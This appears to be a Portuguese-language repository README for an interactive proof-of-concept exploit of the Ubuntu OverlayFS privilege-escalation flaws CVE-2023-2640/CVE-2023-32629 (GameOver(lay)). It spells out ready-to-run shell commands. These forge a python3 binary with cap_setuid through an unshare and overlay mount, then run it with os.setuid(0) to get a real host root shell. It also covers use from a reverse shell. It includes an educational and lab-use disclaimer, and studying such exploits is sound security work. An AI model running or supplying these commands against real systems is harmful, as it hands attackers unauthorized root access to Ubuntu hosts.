
Um exploit de escalonamento local de privilégios (LPE) limpo, interativo e de múltiplas etapas para Ubuntu OverlayFS (GameOver(lay)) que escapa do sandbox de namespace de usuário para obter um shell root verdadeiro do host.
Uma Prova de Conceito (PoC) interativa e em várias etapas de Escalação Local de Privilégios (LPE) que visa as vulnerabilidades OverlayFS do kernel Linux Ubuntu (CVE-2023-2640 / CVE-2023-32629).
Ao contrário dos one-liners automatizados padrão que prendem seu shell interativo dentro de um User Namespace (Fake Root) restritivo, esta metodologia divide a sequência do exploit para obter com segurança um shell root real e irrestrito do host.
Muitos exploits públicos combinam a configuração e a execução em uma única sequência de shell automatizada, como esta:
unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"
Como o payload de execução Python está embutido dentro das aspas duplas do unshare, ele é executado internamente dentro do sandbox do user namespace.
uid=0(root), mas seu shell está criptograficamente isolado do host. Se você tentar visualizar o diretório root do host (cd /root), receberá um erro Permission Denied.Esta PoC divide o processo em dois estágios lógicos distintos:
unshare para fingir permissões de root apenas pelo tempo suficiente para explorar a falha ovl_copy_up do OverlayFS, vazando uma capability de alto privilégio setcap cap_setuid+eip para uma pasta de binário Python local.os.setuid(0) e concede a você verdadeiros privilégios de administração do sistema no nível do host.ovl_copy_up_meta_inode_data do kernel Ubuntu que permite que verificações de validação sejam totalmente ignoradas durante a migração de arquivos.6.2.0-26-generic.exploit.sh para a máquina alvo (por exemplo, dentro de /tmp).chmod +x exploit.sh
./exploit.sh
Se você estiver trabalhando em um reverse shell volátil, execute esses comandos completamente separados, pressionando Enter após cada linha:
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m
# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Verifique seus privilégios reais consultando seu perfil de usuário atual:
whoami
cat /root/root.txt
A mecânica básica do exploit usada nesta reformulação interativa foi originalmente descoberta e documentada pelos pesquisadores de segurança Liav Eliyahu e g1vi.
Este repositório foi criado estritamente para fins educacionais, de pesquisa em segurança e de testes de penetração autorizados (como laboratórios HackTheBox / OffSec). O autor não se responsabiliza por uso indevido, tentativas de acesso não autorizado ou danos à infraestrutura causados por estes materiais. Use com responsabilidade.